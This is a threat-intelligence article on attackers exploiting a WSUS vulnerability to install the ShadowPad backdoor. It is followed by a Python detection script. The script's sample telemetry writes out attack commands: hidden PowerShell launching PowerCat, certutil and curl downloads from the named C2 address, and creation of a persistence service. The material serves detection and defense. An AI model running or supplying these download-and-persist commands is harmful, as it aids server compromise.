Chinese-backed attackers have begun weaponizing a critical vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute ShadowPad, a sophisticated backdoor malware linked to multiple state-sponsored groups.
The attack chain exploits CVE-2025-59287, a remote code execution flaw that grants system-level access to vulnerable servers.
Since the proof-of-concept code was released publicly in October, threat actors have rapidly adopted this vulnerability to compromise enterprise networks running WSUS infrastructure.
The attack begins when hackers target Windows Servers with WSUS enabled, leveraging CVE-2025-59287 to gain initial system access.
Once inside, attackers deploy PowerCat, an open-source PowerShell-based utility that provides direct command shell access to the compromised system.
This first-stage foothold allows attackers to execute subsequent commands needed for malware deployment.
ASEC security analysts identified the malware after observing PowerCat execution commands being used in attacks.
The researchers documented how threat actors then download and install ShadowPad using legitimate Windows utilities like certutil and curl. This technique helps evade detection because these tools are standard components of Windows systems.
On November 6th, ASEC’s infrastructure detected attackers downloading multiple encoded files before decoding and executing them as the ShadowPad payload.
Persistence Through DLL Sideloading
ShadowPad operates through a well-known evasion technique called DLL sideloading. Rather than running as a standalone executable, the malware relies on a legitimate Windows application (ETDCtrlHelper.exe) that loads a malicious DLL (ETDApix.dll) carrying the name of the library the application expects.
When the legitimate program runs, it unknowingly loads the compromised library, which acts as a loader for the actual ShadowPad backdoor operating entirely in memory.
The core malware functionality is stored in a temporary file containing complete backdoor configuration data.
The malware establishes persistence by creating services, registry entries, and scheduled tasks with the identifier “Q-X64.” It communicates with command-and-control servers at 163.61.102[.]245 using HTTP and HTTPS protocols while disguising traffic with standard Firefox browser headers.
The malware can inject itself into multiple system processes, including Windows Mail, Media Player, and svchost services.
Organizations running WSUS should immediately apply Microsoft’s security update for CVE-2025-59287 and monitor server logs for suspicious PowerShell, certutil, and curl execution patterns to detect potential compromise attempts.
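As an added illustration of the detection advice above, the following Python script is example code written for this article, not ASEC's or Microsoft's tooling. It scans constructed process-creation and image-load records (fields modelled on Sysmon Event ID 1/7 and Security Event 4688) for the stages the article describes: a shell or living-off-the-land binary spawned under the WSUS worker process, certutil/curl download-and-decode command lines, the published C2 address, the Q-X64 persistence name, and the ETDCtrlHelper.exe/ETDApix.dll sideload pair. The assumption that WSUS code executes inside w3wp.exe and WsusService.exe, the regular expressions, and every sample record are constructed for this example and not taken from the report; the indicator values themselves come from the article.

```python
"""Detection logic for the WSUS -> PowerCat -> ShadowPad chain (added example).

Runs over constructed telemetry records and returns, per record, the list of
pattern names that matched. Nothing here is ASEC's or Microsoft's code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators named in the article.
SIDELOAD_HOST = "etdctrlhelper.exe"   # legitimate host application
SIDELOAD_DLL = "etdapix.dll"          # malicious DLL it is tricked into loading
PERSISTENCE_ID = "q-x64"              # service / registry / scheduled-task name
C2_IP = "163.61.102.245"              # C2 address (defanged in the article)

# ASSUMPTION: WSUS request handling runs in the IIS worker (w3wp.exe, WsusPool)
# and in WsusService.exe, so a shell or LOLBin spawned directly under either
# is a strong post-exploitation signal.
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "curl.exe"}

# Constructed regexes for the download / decode / shell patterns.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\s.*-(urlcache|verifyctl|decode)\b", re.I)
CURL_DOWNLOAD = re.compile(r"curl(\.exe)?\s.*(-o|--output|-O)\b", re.I)
POWERCAT = re.compile(r"powercat|-enc(odedcommand)?\s|Invoke-Expression|\bIEX\b", re.I)


@dataclass
class Event:
    event_type: str            # "process" (creation) or "imageload" (DLL load)
    image: str                 # created binary, or host process for imageload
    command_line: str = ""
    parent_image: str = ""
    loaded_image: str = ""     # DLL path for imageload events


def basename(path: str) -> str:
    """Lower-cased file name regardless of slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> list[str]:
    """Return the names of every pattern the event matches (empty if benign)."""
    hits: list[str] = []
    if ev.event_type == "process":
        if basename(ev.parent_image) in WSUS_PARENTS and basename(ev.image) in LOLBINS:
            hits.append("lolbin-spawned-by-wsus")
        if CERTUTIL_DOWNLOAD.search(ev.command_line):
            hits.append("certutil-download-or-decode")
        if CURL_DOWNLOAD.search(ev.command_line):
            hits.append("curl-download")
        if POWERCAT.search(ev.command_line):
            hits.append("powercat-or-encoded-powershell")
        if C2_IP in ev.command_line:
            hits.append("known-c2-address")
        if PERSISTENCE_ID in ev.command_line.lower():
            hits.append("shadowpad-persistence-id")
    elif ev.event_type == "imageload":
        if basename(ev.image) == SIDELOAD_HOST and basename(ev.loaded_image) == SIDELOAD_DLL:
            hits.append("etdctrlhelper-sideload")
    return hits


def scan(events: list[Event]) -> list[tuple[int, list[str]]]:
    """(index, hits) for every event that matched at least one pattern."""
    results = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry; paths, file names and ordering are invented.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -nop -w hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\powercat.ps1",
          r"C:\Windows\System32\inetsrv\w3wp.exe"),
    Event("process", r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -urlcache -split -f http://163.61.102.245/u.dat C:\Windows\Temp\u.dat",
          r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -decode C:\Windows\Temp\u.dat C:\ProgramData\ETDApix.dll",
          r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\curl.exe",
          r"curl.exe -o C:\ProgramData\ETDCtrlHelper.exe http://163.61.102.245/h.bin",
          r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\sc.exe",
          r'sc.exe create Q-X64 binPath= "C:\ProgramData\ETDCtrlHelper.exe" start= auto',
          r"C:\Windows\System32\cmd.exe"),
    Event("imageload", r"C:\ProgramData\ETDCtrlHelper.exe",
          loaded_image=r"C:\ProgramData\ETDApix.dll"),
    # Benign activity that must not alert.
    Event("process", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
          r"C:\Windows\System32\services.exe"),
    Event("process", r"C:\Windows\System32\curl.exe", "curl.exe --version",
          r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -hashfile C:\setup.msi SHA256", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The checks are deliberately independent so a single alert (certutil with -urlcache, or any process created under w3wp.exe) still fires when the rest of the chain is missing from the logs; correlating several of them within a short window on one host is what separates this activity from routine administration.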
